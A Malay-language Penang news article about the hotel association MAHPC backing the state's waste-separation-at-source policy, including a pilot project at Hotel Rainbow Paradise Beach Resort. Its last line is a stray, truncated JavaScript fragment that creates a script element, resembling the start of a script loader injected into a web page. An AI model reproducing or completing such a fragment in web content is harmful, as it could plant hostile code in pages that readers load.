MAHPC sambut baik inisiatif pengasingan sisa

Oleh : AINUL WARDAH SOHILLI

Gambar : ALISSALA THIAN

TANJUNG BUNGA – Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon memuji sikap Malaysia Association of Hotels, Penang Chapter (MAHPC) yang menggalakkan ahli-ahlinya melaksanakan pengasingan sisa dalam usaha memastikan pelaksanaan Dasar Pengasingan Sisa di Punca dilakukan dengan jayanya.

Rashid ketika ditemui baru-baru ini berkata, Kerajaan Negeri amat berbesar hati apabila inisiatif yang diambil mendapat sambutan baik daripada pengusaha-pengusaha hotel di Pulau Pinang.

Jelasnya, Kerajaan Negeri sentiasa mengalu-alukan semangat dan kerjasama positif dalam kalangan semua lapisan rakyat mahupun organisasi kerajaan dan bukan kerajaan (NGO) di Pulau Pinang ke arah pelaksanaan dasar berkaitan pada 1 Jun nanti.

“Pengurusan sisa adalah sesuatu yang mencabar, namun, saya percaya, inisiatif yang diambil oleh semua pihak mampu menjadikan Pulau Pinang negeri unggul dalam pengurusan sisa terutama sisa domestik dan pepejal di kawasankawasan kediaman dan industri.

“Seperti yang diwar-warkan sebelum ini, Pulau Pinang menghasilkan sejumlah 1,700 tan metrik sisa dalam tempoh sehari dan kesemua sisa ini dibawa ke tapak pelupusan sampah di Pulau Burung.

“Jumlah sisa yang dijana setiap hari ini sentiasa tinggi dan ia akan memendekkan hayat tapak pelupusan sedia ada dan adalah mustahil dengan keadaan geografi Pulau Pinang untuk mencari tapak baru.

“Oleh itu, kita (Kerajaan Negeri) amat berbesar hati apabila Projek Perintis Dasar Pengasingan Sisa Di Punca bagi kategori hotel dapat dilaksanakan di Hotel Rainbow Paradise Beach Resort sebagai galakan untuk hotel-hotel lain tampil menyahut inisiatif ini,” katanya sejurus majlis pelancaran projek berkaitan di sini baru-baru ini.

Hadir sama, Ketua Unit Pengurusan Sisa Pepejal, Oon Lai Kuan; Pengarah Perkhidmatan Perbandaran Majlis Bandaraya Pulau Pinang (MBPP), Mubarak Junus; Pengarah Urusan Hotel Rainbow Paradise Beach Resort, Calvin Koay dan Pengerusi MAHPC, Khoo Boo Lim serta wakil-wakil hotel di Pulau Pinang.

Terdahulu, inisiatif serupa turut diluncurkan di pejabat pentadbiran kerajaan di Komtar (bagi kategori pejabat kerajaan) dan di Flat Projek Perumahan Rakyat (PPR) Kampung Melayu, Air Itam (bagi kategori kediaman bertingkat PPR).

var d=document;var s=d.createElement(‘script’);